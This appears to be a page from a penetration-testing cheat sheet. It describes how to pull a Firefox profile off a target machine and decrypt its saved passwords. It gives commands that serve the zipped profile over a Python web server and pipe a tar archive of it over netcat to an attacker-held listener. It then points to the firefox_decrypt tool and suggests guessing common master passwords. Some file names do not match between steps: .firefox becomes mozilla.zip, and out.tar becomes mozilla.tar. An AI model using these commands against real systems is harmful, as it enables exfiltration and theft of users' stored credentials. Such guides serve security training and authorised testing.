search
Page cover

Mozilla Pentesting

hashtag
Extract Passwords from Firefox Profilearrow-up-right

hashtag
1. Transfer the .firefox Directoryarrow-up-right

  • Zip

    First, zip .firefox directory in target machine, and open web server to transfer the zip file to local machine.

    zip -r /tmp/firefox.zip .firefox
cd /tmp
python3 -m http.server 8000
Copied!

    In local machine, download the zip file from the remote machine, and decompress it.

    wget http://<target-ip>:8000/mozilla.zip
unzip mozilla.zip
Copied!

  • Tar

    If we cannot use zip, tar also can be used. In local machine, start listener for getting the archived directory. "out.tar" will be created when the remote machine will send the compressed directory.

    nc -lvnp 1234 > out.tar
Copied!

    In remote machine, compress the directory and transfer over netcat.

    tar -cf - mozilla/ | nc <local-ip> 1234
Copied!

    Then, decompress it in local.

    tar -xf mozilla.tar
Copied!

hashtag
2. Decrypt the Passwordarrow-up-right

To crack the profile of Firefox, use firefox_decryptarrow-up-right.

If we’ll be asked the master password and we don’t know it, try common passwords.

PreviousLinux Privilege EscalationNextOpenSSL Privilege Escalation

Last updated